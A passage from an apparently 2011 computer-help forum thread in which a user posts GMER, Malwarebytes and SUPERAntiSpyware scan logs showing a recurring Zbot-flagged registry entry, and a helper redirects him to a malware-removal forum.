IAT             C:\Program Files\Common Files\McAfee\SystemCore\mfevtps.exe[1736] @ C:\Windows\system32\CRYPT32.dll [ADVAPI32.dll!RegQueryValueExW]  [00237740] C:\Program Files\Common Files\McAfee\SystemCore\mfevtps.exe (McAfee Process Validation Service/McAfee, Inc.)

IAT             C:\Program Files\Common Files\McAfee\SystemCore\mfevtps.exe[1736] @ C:\Windows\system32\CRYPT32.dll [KERNEL32.dll!LoadLibraryA]      [002377A0] C:\Program Files\Common Files\McAfee\SystemCore\mfevtps.exe (McAfee Process Validation Service/McAfee, Inc.)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdiplusShutdown]                                                [73F67817] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipCloneImage]                                                 [73FBA86D] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipDrawImageRectI]                                             [73F6BB22] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipSetInterpolationMode]                                       [73F5F695] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdiplusStartup]                                                 [73F675E9] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipCreateFromHDC]                                              [73F5E7CA] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipCreateBitmapFromStreamICM]                                  [73F98395] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipCreateBitmapFromStream]                                     [73F6DA60] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipGetImageHeight]                                             [73F5FFFA] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipGetImageWidth]                                              [73F5FF61] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipDisposeImage]                                               [73F571CF] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipLoadImageFromFileICM]                                       [73FECAE2] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipLoadImageFromFile]                                          [73F8C8D8] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipDeleteGraphics]                                             [73F5D968] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipFree]                                                       [73F56853] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipAlloc]                                                      [73F5687E] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

IAT             C:\Windows\Explorer.EXE[3132] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipSetCompositingMode]                                         [73F62AD1] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6002.18342_none_9e54f8aaca13c773\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)



---- Devices - GMER 1.0.15 ----



AttachedDevice  \FileSystem\Ntfs \Ntfs                                                                                                               mfehidk.sys (McAfee Link Driver/McAfee, Inc.)

AttachedDevice  \Driver\tdx \Device\Tcp                                                                                                              avgtdix.sys

AttachedDevice  \Driver\tdx \Device\Udp                                                                                                              avgtdix.sys

AttachedDevice  \Driver\tdx \Device\RawIp                                                                                                            avgtdix.sys

AttachedDevice  \FileSystem\fastfat \Fat                                                                                                             fltmgr.sys (Microsoft Filesystem Filter Manager/Microsoft Corporation)

AttachedDevice  \FileSystem\fastfat \Fat                                                                                                             mfehidk.sys (McAfee Link Driver/McAfee, Inc.)

AttachedDevice  \FileSystem\fastfat \Fat                                                                                                             AVGIDSFilter.Sys



---- EOF - GMER 1.0.15 ----





#5 cryptodan

cryptodan

    Bleepin Madman


  • Members
  • 21,868 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Catonsville, Md
  • Local time:03:27 AM

Posted 01 July 2011 - 11:15 AM

Can you perform a complete scan with Malwarebytes?

#6 Neiltoo

Neiltoo
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:03:27 AM

Posted 01 July 2011 - 11:22 AM

Hi,
Do you mean a full scan? If so,I did. The log is immediately after the one for the quick scan above:

Malwarebytes' Anti-Malware 1.50.1.1100
www.malwarebytes.org

Database version: 6991

Windows 6.0.6002 Service Pack 2
Internet Explorer 9.0.8112.16421

01/07/2011 11:19:11
mbam-log-2011-07-01 (11-19-11).txt

Scan type: Full scan (C:\|D:\|H:\|)
Objects scanned: 344237
Time elapsed: 1 hour(s), 45 minute(s), 58 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 1
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\R

un\{485D2B40-06CC-D798-971D-E5570506DAD0} (Trojan.ZbotR.Gen) 

-> Value: {485D2B40-06CC-D798-971D-E5570506DAD0} -> 

Quarantined and deleted successfully.

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)


Sorry, I'm not currently at the location of the problem pc so I dont know if there is a difference between 'complete' and 'full'

Cheers

Neil

#7 cryptodan

cryptodan

    Bleepin Madman


  • Members
  • 21,868 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Catonsville, Md
  • Local time:03:27 AM

Posted 01 July 2011 - 11:31 AM

Try running Super Anti-Spyware in regular mode and not safe mode.

#8 Neiltoo

Neiltoo
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:03:27 AM

Posted 02 July 2011 - 06:07 AM

Super Anti-Spyware in regular mode as requested:

SUPERAntiSpyware Scan Log
http://www.superantispyware.com

Generated 07/02/2011 at 11:47 AM

Application Version : 4.55.1000

Core Rules Database Version : 7365
Trace Rules Database Version: 5177

Scan type : Complete Scan
Total Scan Time : 02:17:34

Memory items scanned : 820
Memory threats detected : 0
Registry items scanned : 9983
Registry threats detected : 0
File items scanned : 168853
File threats detected : 0



I also ran Malwarebytes again, the same infected item was found again despite having been quarantined and deleted after the last scan:

Malwarebytes' Anti-Malware 1.50.1.1100
www.malwarebytes.org

Database version: 6991

Windows 6.0.6002 Service Pack 2
Internet Explorer 9.0.8112.16421

02/07/2011 12:02:26
mbam-log-2011-07-02 (12-02-25).txt

Scan type: Quick scan
Objects scanned: 175372
Time elapsed: 5 minute(s), 46 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 1
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{485D2B40-06CC-D798-971D-E5570506DAD0} (Trojan.ZbotR.Gen) -> Value: {485D2B40-06CC-D798-971D-E5570506DAD0} -> Quarantined and deleted successfully.

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)



#9 cryptodan

cryptodan

    Bleepin Madman


  • Members
  • 21,868 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Catonsville, Md
  • Local time:03:27 AM

Posted 02 July 2011 - 06:20 AM

Please follow the instructions in ==>This Guide<==.

Once the proper logs are created, then make a NEW TOPIC and post it ==>HERE<== Please include the link to this topic in your new topic and a description of your computer issues and what you have done to resolve them.

If you can produce at least some of the logs, then please create the new topic and explain what happens when you try to create the log(s) that you couldn't get. If you cannot produce any of the logs, then still post the topic and explain that you followed the Prep. Guide, were unable to create the logs, and describe what happens when you try to create the logs.

Once you have created the new topic, please reply back here with a link to the new topic.

#10 Neiltoo

Neiltoo
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:03:27 AM

Posted 02 July 2011 - 06:28 AM

Ok will do!
Should I run GMER again or will the log from yesterdays run suffice?
Thanks
Neil

Sorry stupid question!!

Edited by Neiltoo, 02 July 2011 - 06:48 AM.


#11 cryptodan

cryptodan

    Bleepin Madman


  • Members
  • 21,868 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Catonsville, Md
  • Local time:03:27 AM

Posted 02 July 2011 - 01:22 PM

It should suffice.

#12 Neiltoo

Neiltoo
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:03:27 AM

Posted 05 July 2011 - 03:14 AM

New topic created:

http://www.bleepingcomputer.com/forums/topic407749.html




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users